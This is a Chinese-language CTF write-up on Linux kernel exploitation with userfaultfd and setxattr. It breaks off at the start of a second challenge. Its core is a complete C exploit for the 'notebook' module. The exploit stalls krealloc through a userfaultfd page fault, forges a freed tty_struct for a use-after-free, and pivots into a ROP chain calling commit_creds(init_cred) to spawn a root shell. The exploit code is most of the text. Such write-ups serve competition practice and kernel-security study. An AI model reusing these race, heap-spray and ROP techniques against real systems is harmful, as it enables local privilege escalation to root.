Kernel Pwn Syscall userfaultfd and Syscall setxattr

userfaultfd 是一个系统调用, 可以用来自定义 handler 处理缺页等情况. 简单来说是通过新建一个线程, 然后监视一个页面. 在任何时刻出现了缺页的情况, 触发缺页的线程挂起, 监视线程进行处理, 处理完毕后唤醒之前挂起的线程.

在 CTF 题中通常用来卡条件竞争. 当内核模块中有 copy_from_user / copy_to_user 的时候, 内核会访问用户空间的内存. 如果我们传入的是一个被 uffd 监视的地址, 那么这个线程将会被挂起, 直到缺页处理结束. 这样就能够控制内核中线程的执行顺序, 从而更好地达到想要的竞争效果.

uffd 使用模板如下:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
/* Affinity mask shared by every caller of set_cpu(). */
cpu_set_t cpu;

/*
 * Restrict the calling thread to one CPU.
 *
 * id: index of the only CPU left set in the global mask `cpu`.
 *
 * The mask is rebuilt from scratch on every call. The result of
 * sched_setaffinity() is not inspected.
 */
void set_cpu(int id) {
    CPU_ZERO(&cpu);
    CPU_SET(id, &cpu);

    /* A pid of 0 addresses the calling thread. */
    sched_setaffinity(0, sizeof cpu, &cpu);
}

/*
 * Monitor thread for a userfaultfd-registered range (template).
 *
 * arg: the userfaultfd file descriptor, passed through the void * argument
 *      by register_userfaultfd().
 *
 * Each page-fault message read from the descriptor is counted, and the
 * per-fault hook goes into the switch below. While this thread is inside the
 * switch, the thread that triggered the fault stays blocked. The fault is then
 * resolved by copying a scratch page over the faulting page with UFFDIO_COPY,
 * which lets the blocked thread continue.
 *
 * Returns NULL when poll() stops reporting events, or immediately if the
 * scratch page cannot be allocated.
 */
static void *fault_handler_thread(void *arg) {
    static int fault_cnt = 0;
    static struct uffd_msg msg;
    struct uffdio_copy copy;
    struct pollfd pollfd;
    long uffd;
    /* Zero-filled so the page handed to UFFDIO_COPY has defined contents. */
    char *page = calloc(0x1000, 1);

    if (page == NULL)
        return NULL;

    set_cpu(0);

    uffd = (long)arg;
    pollfd.fd = uffd;
    pollfd.events = POLLIN;

    while (poll(&pollfd, 1, -1) > 0) {
        /* Never act on a stale or partial message. */
        if (read(uffd, &msg, sizeof(msg)) != (ssize_t)sizeof(msg))
            continue;
        printvar(success, "fault count", fault_cnt);

        /* One case per expected fault, in the order the faults are triggered. */
        switch (fault_cnt++) {
            case 0: {
                break;
            }
            default:
                break;
        }

        /* Resolve the fault: fill the page-aligned faulting page from `page`. */
        copy.src = (size_t)page;
        copy.dst = (size_t)msg.arg.pagefault.address & ~(0x1000 - 1);
        copy.len = 0x1000;
        copy.mode = 0;
        copy.copy = 0;
        ioctl(uffd, UFFDIO_COPY, &copy);
    }
    return NULL;
}

/*
 * Put [addr, addr + len) under userfaultfd supervision and start a monitor
 * thread for it.
 *
 * addr:    start of the range to watch.
 * len:     length of the range in bytes.
 * handler: thread routine; it receives the userfaultfd descriptor cast to
 *          void *.
 *
 * The range is registered for missing-page faults only. Any failure is
 * reported on stderr and terminates the process: without a working
 * registration the later accesses would not block and the race this helper
 * exists for could not be controlled.
 */
void register_userfaultfd(void *addr, unsigned long len, void *(*handler)(void*)) {
    struct uffdio_api uffdio_api = { .api = UFFD_API, .features = 0 };
    struct uffdio_register uffdio_register = {
        .range = { .start = (unsigned long) addr, .len = len },
        .mode = UFFDIO_REGISTER_MODE_MISSING,
    };
    pthread_t monitor_thread;
    long uffd;
    int err;

    uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd < 0) {
        perror("userfaultfd");
        exit(EXIT_FAILURE);
    }

    /* The API handshake has to precede any other ioctl on the descriptor. */
    if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) {
        perror("UFFDIO_API");
        exit(EXIT_FAILURE);
    }

    if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) {
        perror("UFFDIO_REGISTER");
        exit(EXIT_FAILURE);
    }

    /* pthread_create() returns the error number instead of setting errno. */
    err = pthread_create(&monitor_thread, NULL, handler, (void *) uffd);
    if (err != 0) {
        fprintf(stderr, "pthread_create: error %d\n", err);
        exit(EXIT_FAILURE);
    }
}

其中, register_userfaultfd(addr, len, handler) 用来创建一个监视线程, 监视地址 addr 到 addr + len 范围内的缺页情况. 监视线程函数 fault_handler_thread 不断 poll 查询并处理缺页事件, 其中用 switch case 结构让每一次缺页执行不同的流程. 最后调用 ioctl(uffd, UFFDIO_COPY, &copy), 完成后唤醒触发缺页的线程.

同时还用 sched_setaffinity 将线程调度全限制在一个 CPU 上, 这样主线程触发缺页以后, 转到监视线程处理, 最后回到主线程这个调度顺序就不会变了.

(复现的时候认为 module 地址的偏移和 kernel base 一样, 没有泄漏地址就写 ROP 链了, 不想改了, 就当没有 kaslr 吧, 反正重点不在这)

qemu 启动脚本

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
#!/bin/sh
# Boot the notebook challenge kernel under QEMU.
#   -append "... nokaslr"   kernel command line; KASLR is switched off
#   -smp cores=2,threads=2  four logical CPUs in the guest
#   -cpu kvm64,+smep,+smap  guest CPU with SMEP and SMAP enabled
#   -monitor /dev/null      QEMU monitor attached to /dev/null
#   -s                      QEMU shorthand for a gdb stub on tcp::1234
# The "2>/dev/null" in the middle of the command discards QEMU's stderr.
qemu-system-x86_64 \
    -m 128M \
    -kernel bzImage \
    -initrd rootfs.cpio \
    -append "console=ttyS0 oops=panic panic=1 nokaslr" \
    -nographic \
    -net user \
    -net nic \
    -device e1000 \
    -smp cores=2,threads=2 \
    -cpu kvm64,+smep,+smap \
    -monitor /dev/null 2>/dev/null \
    -s

开启 smep, smap, kpti.

init:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#!/bin/sh
# Guest init script: mounts the pseudo filesystems, loads the vulnerable
# module and hands an unprivileged shell to the player.
/bin/mount -t devtmpfs devtmpfs /dev
chown root:tty /dev/console
chown root:tty /dev/ptmx
chown root:tty /dev/tty
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts

mount -t proc proc /proc
mount -t sysfs sysfs /sys

# Limit kernel pointer and dmesg exposure for the unprivileged user.
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

ifup eth0 > /dev/null 2>/dev/null

# Load the module and, while still root, save its /proc/modules line to a
# world-accessible file; the exploit later parses the load address from it.
insmod notebook.ko
cat /proc/modules | grep notebook > /tmp/moduleaddr
chmod 777 /tmp/moduleaddr
chmod 777 /dev/notebook
# Delayed forced power-off in the background (presumably 300 seconds; confirm
# against the busybox build in use).
poweroff -d 300 -f &
echo "Welcome to QWB!"

#sh
# Interactive shell running as uid 1000.
setsid cttyhack setuidgid 1000 sh

umount /proc
umount /sys

poweroff -d 1 -n -f

module 是个菜单题, 堆有 16 个, 实现了 read 和 write:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
// Decompiler output for the module's read handler: copies a note to user space.
//
// a2 is used as the user-space destination. The note index is taken from v2,
// i.e. whatever rdx holds on entry (the decompiler did not recover it as a
// parameter) - presumably the count argument of read(), which matches how the
// exploit calls read(fd, buf, idx).
// Returns -1 when the index is rejected, 0 otherwise.
__int64 __fastcall mynote_read(__int64 a1, __int64 a2)
{
  unsigned __int64 v2; // rdx
  unsigned __int64 idx; // rdx
  __int64 size; // r13
  char *note; // rbx

  _fentry__(a1, a2);
  // NOTE(review): index 0x10 itself passes this check, while noteadd and
  // noteedit reject anything above 0xF - looks like an off-by-one; confirm
  // against the real size of notebook[].
  if ( v2 > 0x10 )
  {
    printk("[x] Read idx out of range.\n");
    return -1LL;
  }
  else
  {
    idx = v2;
    // No lock is taken here; the length comes from the table entry, not from
    // the caller.
    size = notebook[idx].size;
    note = notebook[idx].note;
    _check_object_size(note, size, 1LL);
    // The result of copy_to_user() is ignored.
    copy_to_user(a2, note, size);
    printk("[*] Read success.\n");
    return 0LL;
  }
}
// Decompiler output for the module's write handler: fills a note from user space.
//
// a2 is used as the user-space source. The note index is taken from v2, i.e.
// whatever rdx holds on entry - presumably the count argument of write(),
// matching the exploit's write(fd, buf, idx) calls.
// Returns -1 when the index is rejected and 0 in every other case, including
// a failed copy.
__int64 __fastcall mynote_write(__int64 a1, __int64 a2)
{
  unsigned __int64 v2; // rdx
  unsigned __int64 v3; // rdx
  __int64 size; // r13
  char *note; // rbx

  _fentry__(a1, a2);
  // NOTE(review): index 0x10 itself passes this check (compare the 0xF limit
  // in noteadd/noteedit).
  if ( v2 > 0x10 )
  {
    printk("[x] Write idx out of range.\n");
    return -1LL;
  }
  else
  {
    v3 = v2;
    // No lock is taken; the number of bytes written is the size stored in the
    // table entry.
    size = notebook[v3].size;
    note = notebook[v3].note;
    _check_object_size(note, size, 0LL);
    if ( copy_from_user(note, a2, size) )
    {
      printk("[x] copy from user error.\n");
      return 0LL;
    }
    else
    {
      printk("[*] Write success.\n");
      return 0LL;
    }
  }
}

还实现了 add, del, edit:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
// Decompiler output for the "add" command: allocates a note of size_1 bytes in
// slot idx.
//
// buf_1 is whatever rdx holds on entry (the third argument as seen by the
// decompiler) and is used as a user pointer for the 256-byte `name` copy.
// Returns 0 on success, -1 for a bad index, -2 for a size above 0x60 and -3
// when the slot already holds a note.
__int64 __fastcall noteadd(unsigned __int64 idx, unsigned __int64 size_1, __int64 buf)
{
  __int64 buf_1; // rdx
  __int64 buf_2; // r13
  NoteBook *cur; // rbx
  __int64 size; // r14
  __int64 v7; // rbx

  _fentry__(idx, size_1);
  if ( idx > 0xF )
  {
    v7 = -1LL;
    printk("[x] Add idx out of range.\n");
  }
  else
  {
    buf_2 = buf_1;
    cur = &notebook[idx];
    // Only the read side of the lock is taken although the entry is modified.
    raw_read_lock(&lock);
    // The new size is stored before it is validated; the old value is put
    // back on the failure paths below.
    size = cur->size;
    cur->size = size_1;
    if ( size_1 > 0x60 )
    {
      cur->size = size;
      v7 = -2LL;
      printk("[x] Add size out of range.\n");
    }
    else
    {
      // User copy performed while the entry already carries the new size.
      copy_from_user(name, buf_2, 256LL);
      if ( cur->note )
      {
        cur->size = size;
        v7 = -3LL;
        printk("[x] Add idx is not empty.\n");
      }
      else
      {
        cur->note = (char *)_kmalloc(size_1, 0x24000C0LL);
        printk("[+] Add success. %s left a note.\n", name);
        v7 = 0LL;
      }
    }
    raw_read_unlock(&lock);
  }
  return v7;
}

// Decompiler output for the "delete" command: frees the note in slot idx.
//
// Returns -1 for a rejected index, 0 otherwise.
__int64 __fastcall notedel(unsigned __int64 idx, __int64 a2)
{
  NoteBook *v2; // rbx

  _fentry__(idx, a2);
  // NOTE(review): index 0x10 itself passes this check (compare the 0xF limit
  // in noteadd/noteedit).
  if ( idx > 0x10 )
  {
    printk("[x] Delete idx out of range.\n");
    return -1LL;
  }
  else
  {
    // The only command in this listing that takes the write side of the lock.
    raw_write_lock(&lock);
    v2 = &notebook[idx];
    kfree(v2->note);
    // The pointer is cleared only when the stored size is non-zero; with a
    // size of 0 the freed pointer stays in the table.
    if ( v2->size )
    {
      v2->size = 0LL;
      v2->note = 0LL;
    }
    raw_write_unlock(&lock);
    printk("[-] Delete success.\n");
    return 0LL;
  }
}

// Decompiler output for the "edit" command: resizes the note in slot idx with
// krealloc().
//
// v2 is whatever rdx holds on entry and is used as a user pointer for the
// 256-byte `name` copy.
// Returns -1 for a bad index, 1 when the size is unchanged, 0 when the stored
// size is zero after the resize, 2 when the new pointer is installed and 3
// when the new pointer fails the validity check.
__int64 __fastcall noteedit(unsigned __int64 idx, __int64 new_size)
{
  __int64 v2; // rdx
  __int64 v3; // r13
  NoteBook *cur; // rbx
  __int64 old_size; // rax
  __int64 new_note; // r12
  __int64 v7; // rbx

  _fentry__(idx, new_size);
  if ( idx > 0xF )
  {
    v7 = -1LL;
    printk("[x] Edit idx out of range.\n");
    return v7;
  }
  v3 = v2;
  cur = &notebook[idx];
  // Only the read side of the lock is taken although the entry is modified.
  raw_read_lock(&lock);
  old_size = cur->size;
  // No upper bound is applied to new_size here (noteadd caps it at 0x60).
  cur->size = new_size;
  if ( old_size == new_size )
  {
    v7 = 1LL;
    goto LABEL_6;
  }
  new_note = krealloc(cur->note, new_size, 37748928LL);
  // The user copy sits between krealloc() and the update of cur->note: while
  // it is in progress the table still holds the pointer that was passed to
  // krealloc().
  copy_from_user(name, v3, 256LL);
  // cur->size is re-read from the table here, after the user copy.
  if ( !cur->size )
  {
    printk("free in fact");
    cur->note = 0LL;
    v7 = 0LL;
    goto LABEL_6;
  }
  if ( (unsigned __int8)_virt_addr_valid(new_note) )
  {
    cur->note = (char *)new_note;
    v7 = 2LL;
LABEL_6:
    raw_read_unlock(&lock);
    printk("[o] Edit success. %s edit a note.\n", name);
    return v7;
  }
  printk("[x] Return ptr unvalid.\n");
  raw_read_unlock(&lock);
  return 3LL;
}

并且给了一个 gift 获得 notebook 内容, 也就是可以得到 object 地址

1
2
3
4
5
6
7
8
// Decompiler output for the "gift" command: copies the first 0x100 bytes of
// the notebook table to the user pointer a1, which exposes the stored note
// pointers. The result of copy_to_user() is ignored; always returns 100.
__int64 __fastcall notegift(__int64 a1, __int64 a2)
{
  _fentry__(a1, a2);
  printk("[*] The notebook needs to be written from beginning to end.\n");
  copy_to_user(a1, notebook, 0x100LL);
  printk("[*] For this special year, I give you a gift!\n");
  return 100LL;
}

add 限制了大小, 但是 edit 中使用 krealloc 并没有限制大小, 而且如果 new_size = 0, 那么实际上就是 free. 这样 del 功能就可以不用了. edit 不会上写锁, 用到的全是读锁, 而读锁之间互不排斥, 和没锁一样, 所以不用管锁了.

注意到 krealloc 后面有一句 copy_from_user, 可以用 uffd 让他卡在这里, 此时 cur->note 被 free 了, 但是没有置零. 在监视线程处理的时候, 就可以 UAF 了. 没有大小限制, 这里使用 struct tty 来 UAF 写 ops, 最后触发 ioctl 栈迁移到事先布置好的 ROP chain 即可.

稍微注意一点: 覆盖 struct tty_struct 用的是 write, 写多少是由 notebook 中对应项的 size 指定的. 虽然 tty_struct 从 slub kmalloc-1k 中取, 但是它本身的大小没有这么多 (exp 中用的是 0x2e0), 直接申请 0x400 然后写的话会覆盖其他结构导致错误.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
// musl-gcc exp.c -static -masm=intel -g -o exp -idirafter /usr/include/ -idirafter /usr/include/x86_64-linux-gnu/
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/sem.h>
#include <sys/wait.h>
#include <asm/ldt.h>
#include <linux/userfaultfd.h>
#include <stdio.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <sched.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <semaphore.h>

/*
 * Write "<ESC>[<color>m<ESC>[1m[<tag>] <msg><ESC>[0m" to stderr.
 *
 * Formatting straight into the stream means the message length is not bounded
 * by any intermediate buffer.
 */
static void log_colored(const char *color, const char *tag, const char *msg) {
    fprintf(stderr, "\033[%sm\033[1m[%s] %s\033[0m", color, tag, msg);
}

/* Print msg in bold green, prefixed with "[+] ". No newline is appended. */
void success(const char *msg) {
    log_colored("32", "+", msg);
}

/* Print msg in bold red, prefixed with "[x] ". No newline is appended. */
void fail(const char *msg) {
    log_colored("31", "x", msg);
}

/*
 * Print msg in bold blue, prefixed with "[*] ", but only when the program is
 * built with DEBUG defined; otherwise this is a no-op.
 */
void debug(const char *msg) {
#ifdef DEBUG
    log_colored("34", "*", msg);
#else
    (void)msg;
#endif
}

/*
 * Format "<hint>: 0x<var in hex>\n" and hand it to one of the printers above.
 *
 * print_handle: printer that receives the formatted line.
 * hint:         label placed in front of the value.
 * var:          value printed in hexadecimal.
 *
 * The line is sized with a first snprintf() pass, so a long hint cannot
 * overflow the buffer. Nothing is printed if formatting or allocation fails.
 */
void printvar(void print_handle(const char *), char *hint, size_t var) {
    int len = snprintf(NULL, 0, "%s: 0x%zx\n", hint, var);
    if (len < 0)
        return;

    char *buf = malloc((size_t)len + 1);
    if (buf == NULL)
        return;

    snprintf(buf, (size_t)len + 1, "%s: 0x%zx\n", hint, var);
    print_handle(buf);
    free(buf);
}

/* User-mode register values captured by saveStatus() and placed at the end of the ROP chain. */
size_t user_cs, user_ss, user_rflags, user_sp;

/*
 * Record the current cs, ss, rsp and rflags in the globals above.
 *
 * The assembly is written in Intel syntax, so the file has to be built with
 * -masm=intel (see the build line at the top of the file).
 */
void saveStatus() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    /*
     * The saved rsp becomes the stack pointer at the entry of the function
     * the kernel returns to. The x86-64 ABI expects rsp + 8 to be 16-byte
     * aligned at function entry (as it is right after a call), so align down
     * and add 8; otherwise aligned SSE stack accesses in the callee can fault.
     */
    user_sp &= ~0xf;
    user_sp += 8;
    success("Status has been saved.\n");
    printvar(debug, "cs", user_cs);
    printvar(debug, "ss", user_ss);
    printvar(debug, "rsp", user_sp);
    printvar(debug, "rflags", user_rflags);
}

/*
 * Landing routine in user space: spawn a shell if the process is root.
 *
 * Never returns. The process always leaves through exit(), with status 0
 * after the shell ends or -1 when the uid is still non-zero, so it terminates
 * normally instead of running into a segmentation fault.
 */
void getRootShell() {
    success("Backing from the kernelspace.\n");

    if (getuid() == 0) {
        success("Successful to get the root. Execve root shell now...\n");
        system("/bin/sh");
        exit(0);
    }

    fail("Failed to get the root!\n");
    exit(-1);
}

/* ioctl command numbers passed to /dev/notebook. */
#define ADD  0x100
#define FREE 0x200
#define EDIT 0x300
#define GIFT 0x64

/* Module load address parsed from /tmp/moduleaddr by pwn(). */
size_t module_addr;
/* Delta added to every address below; pwn() derives it from module_addr. */
size_t kernel_offset;
/*
 * Gadget, symbol and data addresses used by the ROP chain. The values are
 * specific to the kernel image of this challenge.
 */
size_t push_rdi_pop_rsp_pop_rbp_ret = 0xffffffff8143f4e1;
size_t pop_rsp_ret = 0xffffffff810bc110;
size_t pop_rdi_ret = 0xffffffff81007115;
size_t init_cred = 0xffffffff8225c940;
size_t commit_creds = 0xffffffff810a9b40;
size_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81a0093f;
/* Kernel addresses computed in pwn() from the pointer of note 0. */
size_t fake_tty_operations_addr;
size_t rop_chain_addr;
/* Affinity mask set up in pwn() and reused by the fault handler thread. */
cpu_set_t cpu;
/* fd: /dev/notebook; tty_fd: /dev/ptmx opened inside the fault handler. */
int fd, tty_fd;

/* Argument block handed to the notebook ioctls. */
struct Args {
  size_t idx;
  size_t size;
  char *buf;
} args;

/*
 * userfaultfd monitor thread of the notebook exploit.
 *
 * arg: the userfaultfd descriptor cast to void *.
 *
 * The first fault is the one pwn() provokes by passing uffd_page to
 * EDIT(idx 1, size 0). While the faulting thread is blocked, case 0 below
 * runs. According to the write-up, note 1 has just been freed by krealloc()
 * at that point while its pointer is still in the table.
 * Every fault is finally resolved with UFFDIO_COPY from a scratch page.
 */
static void *fault_handler_thread(void *arg) {
    static struct uffd_msg msg;
    struct uffdio_copy copy;
    struct pollfd pollfd;
    long uffd;
    char *page = malloc(0x1000);
    static int fault_cnt = 0;

    /* Same CPU mask as the main thread (filled in by pwn()). */
    sched_setaffinity(0, sizeof(cpu_set_t), &cpu);

    uffd = (long)arg;
    pollfd.fd = uffd;
    pollfd.events = POLLIN;

    while (poll(&pollfd, 1, -1) > 0) {
        read(uffd, &msg, sizeof(msg));
        printvar(success, "fault count", fault_cnt);
        printvar(debug, "addr", msg.arg.pagefault.address);
        switch (fault_cnt++) {
            case 0: {
                /* Opening ptmx allocates a tty structure; the write-up relies
                 * on it reusing the chunk note 1 still points to. */
                tty_fd = open("/dev/ptmx", O_RDWR);
                args.idx = 1;
                args.buf = malloc(0x2e0);
                args.size = 0x2e0;
                size_t *fake_tty_struct = (size_t *)args.buf;
                /* Dump the notebook table; qword 2 is printed as the pointer
                 * of note 1. */
                ioctl(fd, GIFT, &args);
                printvar(debug, "tty", ((size_t *)args.buf)[2]);
                /* Give note 1 a size of 0x2e0 again so read/write below
                 * transfer that many bytes. */
                ioctl(fd, EDIT, &args);
                /* The third argument of read()/write() on fd is the note
                 * index (see mynote_read/mynote_write). */
                read(fd, fake_tty_struct, 1);
                /* Patch qwords 1-3 of the object: stack pivot gadget, ROP
                 * chain address and the fake operations table pointer. */
                fake_tty_struct[1] = pop_rsp_ret;
                fake_tty_struct[2] = rop_chain_addr;
                fake_tty_struct[3] = fake_tty_operations_addr;
                write(fd, fake_tty_struct, 1);
                break;
            }
        }

        /* Resolve the fault so the blocked thread can continue. */
        copy.src = (size_t)page;
        copy.dst = (size_t)msg.arg.pagefault.address & ~(0x1000 - 1);
        copy.len = 0x1000;
        copy.mode = 0;
        copy.copy = 0;
        ioctl(uffd, UFFDIO_COPY, &copy);
    }
    return NULL;
}

/*
 * Put [addr, addr + len) under userfaultfd supervision and start a monitor
 * thread for it.
 *
 * addr:    start of the range to watch.
 * len:     length of the range in bytes.
 * handler: thread routine; it receives the userfaultfd descriptor cast to
 *          void *.
 *
 * The range is registered for missing-page faults only. Any failure is
 * reported on stderr and terminates the process: without a working
 * registration the EDIT call on the watched page would not block and the
 * exploit would fail silently.
 */
void register_userfaultfd(void *addr, unsigned long len, void *(*handler)(void*)) {
    struct uffdio_api uffdio_api = { .api = UFFD_API, .features = 0 };
    struct uffdio_register uffdio_register = {
        .range = { .start = (unsigned long) addr, .len = len },
        .mode = UFFDIO_REGISTER_MODE_MISSING,
    };
    pthread_t monitor_thread;
    long uffd;
    int err;

    uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd < 0) {
        perror("userfaultfd");
        exit(EXIT_FAILURE);
    }

    /* The API handshake has to precede any other ioctl on the descriptor. */
    if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) {
        perror("UFFDIO_API");
        exit(EXIT_FAILURE);
    }

    if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) {
        perror("UFFDIO_REGISTER");
        exit(EXIT_FAILURE);
    }

    /* pthread_create() returns the error number instead of setting errno. */
    err = pthread_create(&monitor_thread, NULL, handler, (void *) uffd);
    if (err != 0) {
        fprintf(stderr, "pthread_create: error %d\n", err);
        exit(EXIT_FAILURE);
    }
}

/*
 * Run the notebook exploit.
 *
 * Steps, in order:
 *   1. pin the thread to CPU 0;
 *   2. read the module load address from /tmp/moduleaddr and rebase every
 *      gadget address by the resulting offset;
 *   3. store the ROP chain in note 0 and learn its kernel address via GIFT;
 *   4. allocate note 1 with size 0x2e0, then EDIT it to size 0 with a
 *      userfaultfd-watched buffer so the call blocks and the fault handler
 *      thread can run its part;
 *   5. issue an ioctl on the tty opened by the handler.
 *
 * Failures of the setup steps (file, device, memory) are reported through
 * fail() and end the process with status -1.
 */
void pwn() {
    CPU_ZERO(&cpu);
    CPU_SET(0, &cpu);
    sched_setaffinity(0, sizeof(cpu_set_t), &cpu);

    FILE *stream = fopen("/tmp/moduleaddr", "r");
    if (stream == NULL) {
        fail("Cannot open /tmp/moduleaddr.\n");
        exit(-1);
    }
    /* Skip the first five fields of the /proc/modules line; the sixth is the
     * load address in hex. */
    int parsed = fscanf(stream, "%*s%*s%*s%*s%*s%zx", &module_addr);
    fclose(stream);
    if (parsed != 1) {
        fail("Cannot parse the module address.\n");
        exit(-1);
    }
    printvar(success, "module addr", module_addr);
    kernel_offset = module_addr - 0xffffffffc0002000;
    printvar(success, "kernel offset", kernel_offset);

    push_rdi_pop_rsp_pop_rbp_ret += kernel_offset;
    pop_rsp_ret += kernel_offset;
    pop_rdi_ret += kernel_offset;
    init_cred += kernel_offset;
    commit_creds += kernel_offset;
    swapgs_restore_regs_and_return_to_usermode += kernel_offset;

    fd = open("/dev/notebook", O_RDWR);
    if (fd < 0) {
        fail("Cannot open /dev/notebook.\n");
        exit(-1);
    }
    args.idx = 0;
    args.size = 0x8 * 12;
    args.buf = malloc(0x100);

    size_t *payload = malloc(0x100);
    if (args.buf == NULL || payload == NULL) {
        fail("Out of memory.\n");
        exit(-1);
    }

    /* Twelve qwords: exactly the 0x8 * 12 bytes requested for note 0. */
    size_t *rop = payload;
    *rop++ = push_rdi_pop_rsp_pop_rbp_ret;
    *rop++ = pop_rdi_ret;
    *rop++ = init_cred;
    *rop++ = commit_creds;
    *rop++ = swapgs_restore_regs_and_return_to_usermode;
    *rop++ = 0;
    *rop++ = 0;
    *rop++ = (size_t)getRootShell;
    *rop++ = user_cs;
    *rop++ = user_rflags;
    *rop++ = user_sp;
    *rop++ = user_ss;

    ioctl(fd, ADD, &args);
    /* The third argument of write() on fd is the note index: fill note 0. */
    write(fd, payload, 0);
    /* GIFT dumps the notebook table; qword 0 is the pointer of note 0. */
    ioctl(fd, GIFT, &args);
    /* Slot 12 of the fake operations table lands on the first qword of note
     * 0; the chain proper starts one qword later. */
    fake_tty_operations_addr = ((size_t *)args.buf)[0] - 8 * 12;
    rop_chain_addr = ((size_t *)args.buf)[0] + 8;
    printvar(debug, "fake tty_operations", fake_tty_operations_addr);

    char *uffd_page = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
    if (uffd_page == MAP_FAILED) {
        fail("Cannot map the userfaultfd page.\n");
        exit(-1);
    }
    printvar(debug, "uffd page", (size_t)uffd_page);
    register_userfaultfd(uffd_page, 0x1000, fault_handler_thread);

    /* Allocate note 1 through EDIT, which has no size cap. */
    args.idx = 1;
    args.size = 0x2e0;
    ioctl(fd, EDIT, &args);
    /* Size 0 plus a buffer in the watched page: this call blocks on the page
     * fault until the handler thread has finished. */
    args.size = 0;
    args.buf = uffd_page;
    ioctl(fd, EDIT, &args);

    /* Any ioctl on the tty goes through the overwritten operations table. */
    ioctl(tty_fd, 0xdeadbeef);
}

/*
 * Entry point: installs getRootShell as the SIGSEGV handler, records the
 * user-mode register state and then runs the exploit.
 */
int main(void) {
    signal(SIGSEGV, getRootShell);

    saveStatus();
    pwn();

    return 0;
}

setxattr 也是一个系统调用, 原型如下:

1
2
int setxattr(const char *path, const char *name,
             const void *value, size_t size, int flags);

他的用途是向 path 指向的文件添加属性 name: value. 其中有如下实现:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
static long
setxattr(struct dentry *d, const char __user *name, const void __user *value,
     size_t size, int flags)
{
    // ...
        kvalue = kvmalloc(size, GFP_KERNEL);
        if (!kvalue)
            return -ENOMEM;
        if (copy_from_user(kvalue, value, size)) {

    // ...

    kvfree(kvalue);

    return error;
}

value 和 size 可以控制. 这里用的 kvmalloc, 根据文档, 他会先尝试 kmalloc, 失败以后再用 vmalloc. 也就是说, 我们可以任意大小分配.

然后跟了一个 copy from user, 从用户空间 value 向刚刚分配出的空间上拷贝 size. 最后使用 kvfree 释放刚刚分配的.

如果我们利用 uffd, 使得该线程卡在 copy from user 的过程中, 这样我们可以向该空间写部分数据, 然后卡住不被释放掉. 如果可以利用 double free 等漏洞, 分配到已被使用的 object 上, 那么就可以造成一个 UAF 写. 这个技术也叫 堆占位.

qemu 启动脚本:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
#!/bin/sh
# Boot the kstack challenge kernel under QEMU.
#   -append "... kaslr quiet"  kernel command line; KASLR is enabled
#   -cpu kvm64,+smep           SMEP is enabled; SMAP is not requested
#   -monitor /dev/null         QEMU monitor attached to /dev/null
qemu-system-x86_64 \
    -m 512M \
    -kernel ./bzImage \
    -initrd ./rootfs.cpio \
